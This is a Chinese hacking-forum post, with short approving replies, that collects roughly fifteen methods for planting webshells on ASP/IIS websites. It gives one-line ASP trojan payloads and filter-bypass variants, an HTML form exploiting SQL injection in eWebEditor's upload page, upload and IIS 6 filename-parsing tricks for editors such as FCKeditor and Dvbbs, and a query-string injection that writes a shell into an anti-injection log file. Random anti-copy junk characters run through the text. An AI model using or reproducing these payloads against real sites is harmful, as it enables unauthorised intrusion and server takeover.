返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
6 N8 o) ]6 v: j# `& q7 t6 j  Y8 |0 _  R
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
1 w, G( y; |- j% L- ]# J. f+ D" S7 q  m' ?. W7 r. _4 a
3.上传漏洞:% j. w) q" }# p- K+ i; B8 ]3 L* R2 g

* ]0 g( {8 l, p( {: T5 R动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
  {% p1 z9 L/ Y  G7 \. S+ |
. o5 G: \( g3 L3 X" |2 q' N( Z, e8 r逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件' V* T+ H# @! D8 V
0 U4 ?) T6 }3 s: c$ j; ?
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp3 R& `/ ^+ N& J& y
然后在上传文件里面填要传的图片格式的ASP木马
0 B, t3 O- Z7 W! f* L9 S就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp+ h- e9 a* R" t- V
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
1 S% \4 s% G0 C$ _, }2 J$ c, m* \
8 ]8 \9 P4 I5 d) {$ q3 d1 w! v<html>
- m" k% P& p' P6 I& W6 v* Z9 P  g<head>
( D" I$ u, D8 t$ q<title>ewebeditor upload.asp上传利用</title>7 V6 V1 z  M* `% N6 |% P, S
</head>
" A0 G  C' n! @* X$ I+ z' O) C<body>
/ V* J7 G! J; P6 p<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">0 W* ^! U% u3 Y* S0 x
<input type=file name=uploadfile size=100><br><br>6 ]+ X& f2 x0 X; s% q; z
<input type=submit value=Fuck>
6 W$ W& i2 S/ y+ }0 X</form>
0 `! o0 U* F9 ]</body>9 s4 n" z2 `$ y$ B/ p
</form>7 e& z9 d' S; Z4 [* i# E1 M' X
</html>* C9 I) b2 I8 s- m- V

$ q+ ?* \7 d" {+ N2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
" J3 ?3 w$ q! s/ W8 q5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
1 R: G  E' P1 G7 e  H
2 s# v0 N9 H' ]利用windows2003解析。建立zjq.asp的文件夹
! Y, @3 B3 ?$ X0 H* P! ?7 _
! P) e' o$ ]5 u; T* b6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型0 b  {( m8 V" V5 U8 f4 L% ~: a

* M% K; y& s# j% e: ~: O7.cuteeditor:类似ewebeditor" v2 y( c2 e4 k$ }3 b

/ K+ t  S. S9 d! M* s8.htmleditor:同上
* x9 A1 T( M, W# q8 k  X8 t
7 v# o" U) \5 X- F* K. }9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破3 E1 t9 }7 P# [* O# B

" \& ^. A, |/ u; v  W( e, h<%execute request("value")%><%'<% loop <%:%>
5 M' H' u1 g5 A3 ^/ ~
5 V! i1 q0 K' }0 J6 i6 ]+ t; P<%'<% loop <%:%><%execute request("value")%>
* q, x1 N/ P1 X9 I( W0 A
% ?8 Z  g. s  n; K, j<%execute request("value")'<% loop <%:%>$ ^2 `& w( T( M3 b1 U/ U& [
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞( t7 {% _! L) R$ |* K% E5 ~
& Y, T3 K$ p0 ~$ [* M- ~! p
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
- z, P6 r' _$ K( i
2 [/ h3 H; [7 m" R. ?1 ~11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
! o9 \. v0 P) y
# P1 v8 H* s$ Q解析漏洞得到webshell& K% O5 b/ Q$ [& `- n1 ~  U" `3 `

0 w( k! [3 k3 O& S* }- l12.mssql差异备份,日志备份,前提需知道web路径1 M3 `: Q* U3 x

. r3 `# }# I0 |7 E0 ?# K13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell8 g' H  m: P5 w
) P2 _. V5 L0 q' G, h: {8 A% a! L" \
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell0 |! l- w  Q9 S

9 f& P. o' N+ C15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可9 Y$ O) m* h+ }: k+ n! @+ H  e( b5 m

; n5 ]# m( C; x; c以上只是本人的一些拙见,并不完善,以后想到了再继续添加& t5 G" s$ D7 z  p( J; s2 O
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 / C  Y! ~7 I2 ?$ w

% U- ]5 y" Q+ ?# t& a% z* D8 v
4 |4 `+ y% [2 I# F* \很好啊、基本的入侵方法都包含了  `( h4 k; H. X

0 }( n* h6 K9 L: ]4 n7 p0 H最好来个提权的帖子再。2 l+ }/ J4 \, o+ m& h5 A7 B# g
5 _5 U! G" Y1 u3 r3 `7 X- y+ V
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表